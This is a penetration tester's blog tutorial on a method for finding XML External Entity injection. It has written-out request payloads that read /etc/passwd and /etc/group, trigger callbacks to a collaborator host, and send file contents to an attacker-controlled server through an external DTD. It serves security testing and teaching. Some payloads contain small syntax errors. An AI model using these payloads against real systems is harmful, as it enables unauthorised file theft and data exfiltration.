General Approach for XML External Entity (XXE) Testing

There's a bunch of articles floating around the internet on XML External Entity (XXE) Injection which typically describe various payloads, attack vectors, and general use cases when it comes to this fun vulnerability. However, back when I was first learning about XXE I could never come across a proper thought process for testing XXE. After running into XXE during various penetration tests, I've decided to share how I personally test this vulnerability, and moreover, what my mindset is when I'm on the hunt for XXE.

Check the bottom of this post for some great references and additional guides to XXE which have helped me over the years.

Quick Review: Internal Entities vs External Entities

Before we dive in, knowing the difference between internal and external entities will save you some headache in the long run. Even though internal entities are not as juicy of an attack vector (other than denial of service), they can be very useful as a litmus test for xxe protections.

This is an Internal XML Entity which is used to expand text:

<!DOCTYPE root [
    <!ENTITY my_entity "foo">
]>

<root>Testing for &my_entity;bar expansion</root>

This will render as: Testing for foobar expansion

And this is an External Entity which is supposed to be used to pull in other XML content

<!DOCTYPE root [
    <!ENTITY my_external_entity SYSTEM "https://www.blah.com/copy.xml">
]>

copy.xml could contain the html entity &copy;

<root>Pull in my external entity &my_external_entity; 2019</root>

This will render as: Pull in my external entity ©2019

Now with that background we can continue on to my personal attack thought process for XXE

DOCTYPE Callbacks

First, can I attempt to load an External DTD and get a DNS (and hopefully HTTP) callback via DOCTYPE declaration? Often times when pentesting an internet facing application firewall rules or network segmentation will block HTTP callbacks; however as an internal pentester, you should be able to receive a HTTP callback most of the times if DNS was at least successful.

<!DOCTYPE dtd SYSTEM "http://###.burpcollaborator.net">

The golden response signaling a great chance at XXE will be valid DNS and HTTP callbacks. It's important to remember at this stage, just because we got a connection doesn't mean we'll be able to retrieve any files or perform other malicious actions.

If we do not get back at least a DNS lookup, odds are network controls are preventing any sort of connection from being made which will make life more difficult for stealing files if we end up with an oob exploit. 99% of the time in my XXE experience I've been at least able to obtain a DNS callback, however your results may vary.

Reflection

The next area I'm keying in on is the application request and response. In order for our traditional XXE to be successful, I'm going to need some application request parameter/data reflected back in the response.... with several caveats we'll get to in a second. The questions I ask myself are:

  • How does a normal request work on the vulnerable endpoint?
  • Are we getting any reflected content back from our input?

Without understanding or estimating how the application functionally works, or attempting to guess at how its processing request data, you're going to be blindly throwing payloads at the application hoping for an exploit. You're a better tester than that.

Instead, look at the content of the request, try to understand if XML parsing is occurring, or if your request is being transformed in some way. For non XML requests, try to understand why that request type is being transformed back into an XML response (and vice-versa). I've seen first hand XML data inside of JSON requests with an XML response, so pay attention to response types!

To the second question, if our input is getting reflected, great! If not, what about an invalid request, are there verbose errors that would allow our user input to get reflected back there?

For the sake of brevity, the scenario below will be about traditional XML Requests and XML responses.

For example, if we have the following request:

POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<root>
    <file_uuid>1337</file_uuid>
</root>


With the following response:

HTTP 200 OK
Content-type: text/xml

<root>
    <file_uuid>1337</file_uuid>
    <file_name>Hello_World.txt</file_uuid>
    <file_contents>foobar</file_contents>
</root>

And an invalid request reflects as:


POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<root>
    <file_uuid>1337xyzabc</file_uuid>
</root>


With the following response:

HTTP 404 NOT FOUND
Content-type: text/xml

<root>
    <error>Could not find file with uuid 1337xyzabc</error>
</root>

We can see that the file_uuid element is reflecting it's data back in the response of the XML processor, we can now use this to our advantage. Once we've established we have reflection, we can begin testing for XXE.

  1. Confirm internal entity expansion to determine if entities are disabled across the board by the XML processor.

POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<!DOCTYPE root [
    <!ENTITY internal "foobar">
]>
<root>
    <file_uuid>1337&internal</file_uuid>
</root>


Will **hopefully** return the following response:

HTTP 404 NOT FOUND
Content-type: text/xml

<root>
    <error>Could not find file with uuid 1337foobar</error>
</root>

2. If we have internal entity expansion, let's move on to a pure XXE payload and retrieve a local file. Based on the architecture of the system the application is running on, choose your given payload (Windows vs Linux). Note: I've started using /etc/group in addition to /etc/passwd as payload types due to file system permission restrictions.


POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<!DOCTYPE root
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
    <file_uuid>1337&xxe;</file_uuid>
</root>


Will hopefully return a successful file include

HTTP 404 NOT FOUND
Content-type: text/xml

<root>
    <error>Could not find file with uuid 1337  root:!:0:0::/:/usr/bin/sh
daemon:!:1:1::/etc:.......</error>
</root>

3. Try a parameter variant. While parameters are typically used in out of band variants, they could be fruitful based on your XML processor and it's worth the 10 seconds it takes to check.


POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<!DOCTYPE root [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY xxe "contents of file: %file;">
]>
<root>
    <file_uuid>1337&xxe;</file_uuid>
</root>


Will **hopefully** return the following response:

HTTP 404 NOT FOUND
Content-type: text/xml

<root>
    <error>Could not find file with uuid 1337 contents of file:  root:!:0:0::/:/usr/bin/sh
daemon:!:1:1::/etc:.......</error>
</root>

4. If the above has failed, it's time to move on to the Out of Band variants

Out of Band (OOB)

What we're referring to with 'Out of Band (OOB)' XXE (sometimes referred to as blind) variants is utilizing XML parameter entities to send the contents of our file to an attacker controlled webserver. What we're attempting to do is retrieve the contents of a given file and then steal one line of that data via a GET request to a local webservers access logs that we're monitoring.

As an attacker, I will typically spin up a python HTTP or HTTPS SimpleHTTPServer module in order to serve up my various XML payloads. Here is a link on how to setup a HTTPS variant of this module.

From my personal experience with oob xxe variants, there is a single requirement which needs to be met in order for you to continue on to more interesting exfiltration vectors such as FTP (for multiline file retrieval):

The parameter nested inside of an entity must expand when called


POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<!DOCTYPE root [
    <!ENTITY % param "foobar">
    <!ENTITY xxe SYSTEM "http://127.0.0.1/%param;">
]>
<root>
    <file_uuid>1337 &xxe;</file_uuid>
</root>


Can return any response, but on your webserver you will check for expansion

HTTP 404 NOT FOUND
Content-type: text/xml

<root>
    <error>Could not find file with uuid 1337</error>
</root>

XXE Python Simple HTTP Server

If you were successful, congrats you've got OOB XXE and can exfiltrate data one line at a time via a GET request in your access logs.

If you do not recieve a GET to /foobar, and instead recieve a GET /%param we're going to have to dive quite a bit deeper into various request types. The next major variant will be attempting to force the entity itself to be written to the doctype and trigger the expansion, rather than triggering the expansion inline. There are several different types of payloads here which all may work (we're starting to have to guess a bit and see what sticks):


POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<!DOCTYPE root [
    <!ENTITY % param SYSTEM "http://127.0.0.1/dtd.xml">
    %param;
    %p;
]>
<root>
    <file_uuid>1337 &xxe;</file_uuid>
</root>

Our External DTD file contains the following:
--------------------
<!ENTITY % exfil SYSTEM "file:///etc/group">
<!ENTITY % p "<!ENTITY xxe SYSTEM 'http://127.0.0.1/?%exfil;'>">

Can return any response, but on your webserver you will check for expansion

HTTP 404 NOT FOUND
Content-type: text/xml

<root>
    <error>Could not find file with uuid 1337</error>
</root>

XXE Showing /etc/group line 1 returned
  1. %param gets called which triggers a connection to our remote server for the "dtd.xml" file.
  2. %p has been loaded into the namespace of our current XML, so we can now trigger %p to load which will write the xxe entity to the namespace.
  3. During this write the %exfil parameter is expanded which triggers a file retrieval of /etc/group and stores it in the %exfil parameter.
  4. Lastly, &xxe; is called which triggers the data to be exfiltrated back to our server and the first line of root is retrieved and logged.

If that example does not work, feel free to seek out more additional payloads at this time as they all follow that same structure for the most part. It all revolves around how the XML processor will actually expand out the parameters when doing HTTP connections.

Wrap Up

At a high level, that was my basic approach to testing for XXE. There are a lot more payloads and examples that I have not covered as there not really necessary and other articles are more detailed on them (see staaldrads FTP link at the bottom). I'll continue to update this page as I flesh out and discover new techniques for XXE testing.


References

Note Link
XXE Payloads PayloadAllTheThings XXE
XXE Payloads 2 staaldraad XXE
Whitepaper (A must Read) VSecurity XML DTD Entity Attacks
XXE Overview Slides OWASP XXE Presentation
Whitepaper (A must Read) VSecurity XML DTD Entity Attacks
Forcing Errors NetSpi Forcing XXE Reflection
FTP XXE staaldrad XXE via FTP